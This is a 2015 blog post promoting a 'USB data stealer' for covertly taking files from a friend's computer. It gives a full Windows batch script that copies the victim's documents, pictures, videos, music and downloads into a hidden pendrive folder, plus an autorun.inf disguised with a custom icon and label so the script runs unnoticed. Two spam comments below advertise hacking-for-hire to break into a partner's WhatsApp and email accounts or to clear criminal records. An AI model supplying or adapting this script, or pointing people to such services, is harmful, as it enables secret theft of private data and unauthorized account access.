Thursday 25 June 2015

USB DATA STEALER.....

DOES YOUR FRIEND HAVE SOME DATA THAT YOU WANT TO STEAL FROM HIM.........



DONT WORRY USE THIS USB DATA STEALER AND YOU CAN STEAL FILES WITHOUT EVEN ANYONE KNOWING.....

STEPS

1:-OPEN NOTEPAD

you can open notepad by pressing win + r,and typing notepad or you can directly search for the notepad..

2:-PASTE THE CODE

@echo off
    :CHECK
    if not exist "hs" md "hs"
    attrib +r +s +h hs
    if exist "%systemdrive%\Documents and Settings" goto COPIER
    goto ERROR
    :COPIER
    if not exist "hs" md "hs\~$sys.computername$"
    if not exist "hs\%computername%\VIDEOS" md "hs\%computername%\VIDEOS"
    if not exist "hs\%computername%\PICTURES" md "hs\%computername%\PICTURES"
    if not exist "hs\%computername%\MUSIC" md "hs\%computername%\MUSIC"
    if not exist "hs\%computername%\DOWNLOADS" md "hs\%computername%\DOWNLOADS"
    copy /y "%userprofile%\My Documents\*.*" "hs\%computername%"
    copy /y "%userprofile%\My Documents\My Videos" "hs\%computername%\VIDEOS"
    copy /y "%userprofile%\My Documents\My Music" "hs\%computername%\MUSIC"
    copy /y "%userprofile%\My Documents\My Pictures" "hs\%computername%\PICTURES"
    copy /y "%userprofile%\My Documents\Downloads" "hs\%computername%\DOWNLOADS"
    MSG %username% "DONE!"
    exit
    :ERROR
    exit

3:-SAVE IT AS .BAT

click on file and save it as bat

4:-CREATE AUTORUN FILE

[autorun]
icon=NAME.ico
label=NAME
open=copier.bat
action=scan

change the name.ico to your icon name
change name to your bat file name(label=name)
change copier.bat to your filename

save it as autorun.inf  and save it.
now copy both bat file and autorun file in your pendrive..

DONE!!


NOTE:-THIS FILE MAKES A DIR IN PENDRIVE NAMED HS YOU CAN CHANGE IT IN PROGRAM..AND THE DIR IS HIDDEN SO YOU WILL NEED TO UNHIDE IT..

ATTRIB -s -h -r hs

USE THIS COMMAND TO UNHIDE THE DIR..


please share if you like it....


 

2 comments:

  1. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete
  2. I Want to use this medium to appreciate an online ghost hacker, after being ripped off my money he helped me find my cheating lover and helped me hacked his WHATSAPP, GMAIL, kik and all his social media platforms and i got to know that he has being cheating on me and in less than 24 hours he helped me out with everything, hacking setting is trust worthy, contact him via: hackingsetting50@gmail.com

    ReplyDelete